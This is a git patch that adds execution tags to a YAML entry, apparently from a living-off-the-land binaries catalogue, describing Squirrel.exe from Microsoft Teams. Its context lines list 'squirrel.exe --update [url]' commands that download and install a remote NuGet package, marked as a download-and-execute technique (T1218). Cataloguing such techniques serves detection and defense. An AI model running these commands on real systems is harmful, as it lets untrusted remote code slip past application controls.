From ae12e139df1c89a228ca30335104e817da8512c4 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:28:11 +0200 Subject: [PATCH] Update Squirrel.yml tags Added Tags: Execute Nuget Execute Remote --- yml/OtherMSBinaries/Squirrel.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index 0055ff3..a8207ad 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml @@ -18,6 +18,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --update [url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -25,6 +28,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -32,6 +38,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -39,6 +48,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Squirrel.exe' Code_Sample: